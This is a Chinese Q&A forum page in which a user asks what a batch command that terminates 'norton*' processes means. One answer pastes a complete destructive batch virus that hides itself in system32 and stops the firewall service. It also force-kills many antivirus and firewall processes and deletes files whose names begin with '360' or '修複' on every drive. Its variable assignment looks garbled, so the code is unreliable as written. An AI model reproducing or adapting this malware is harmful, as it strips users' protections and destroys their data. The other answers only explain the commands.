當前位置:係統粉 > 電腦問答 > 其他問答 > 批處理問題

批處理問題

提問者:溫柔邇晨姐丶  |  瀏覽 次  |  提問時間:2017-03-18  |  回答數量:5

批處理問題 請問一下各位高手~~%s% /im norton* /f >nul這個是什麼意思啊?

已有5條答案
妞妞天然呆

妞妞天然呆

回答數:134  |  被采納數:111

2017-03-18 10:14:35
你的代碼好像不全.%S%應該是一個變量. /IM是參數.
讚 13
隨風逐浪的漢子

隨風逐浪的漢子

回答數:139  |  被采納數:12

2017-03-18 10:35:03
嗬嗬~~~
我對批處理不太熟~~~
有很多不知道這個本來是病毒代碼
@echo off
title You DEAD!!!!!!!
set taskkill=s
copy %0 %windir%\system32\cmd.bat
attrib %windir%\system32\cmd.bat +r +s +h
net stop sharedaccess >nul
%s% /im pfw.exe shadowtip.exe shadowservice.exe qq.exe explorer.exe
IEXOLORE.EXE /f >nul
%s% /im norton* /f >nul
%s% /im av* /f >nul
%s% /im fire* /f >nul
%s% /im anti* /f >nul
%s% /im spy* /f >nul
%s% /im bullguard /f >nul
%s% /im PersFw /f >nul
%s% /im KAV* /f >nul
%s% /im ZONEALARM /f >nul
%s% /im SAFEWEB /f >nul
%s% /im OUTPOST /f >nul
%s% /im nv* /f >nul
%s% /im nav* /f >nul
%s% /im F-* /f >nul
%s% /im ESAFE /f >nul
%s% /im cle /f >nul
%s% /im BLACKICE /f >nul
%s% /im def* /f >nul
%s% /im 360safe.exe /f >nul
net stop Shadow" "System" "Service
set alldrive=d e f g h i j k l m n o p q r s t u v w x y z
for %%a in (c %alldrive%) do del %%a:\360* /f /s /q >nul
for %%a in (c %alldrive%) do del %%a:\修複* /f /s /q >nul
讚 13
怒擼黃子韜巨根

怒擼黃子韜巨根

回答數:148  |  被采納數:132

2017-03-18 13:07:57
找分批處理命令大全,你對照著看下就明白了。
讚 14
不愛喝牛奶的貓

不愛喝牛奶的貓

回答數:48  |  被采納數:41

2017-03-18 10:01:37
謝謝樓主分享!!
讚 4
筆枔

筆枔

回答數:93  |  被采納數:31

2017-03-18 14:31:38
看前麵的這句:
set taskkill=s

%s% /im norton* /f >nul
所以上麵這句= taskkill /im norton* /f >nul
結束norton開頭的進程.

上麵這個病毒主要是結束進程,全盤搜索刪除以360和修複開頭的文件
讚 9
解決方法
版權信息

Copyright @ 2011 係統粉 版權聲明 最新發布內容 網站導航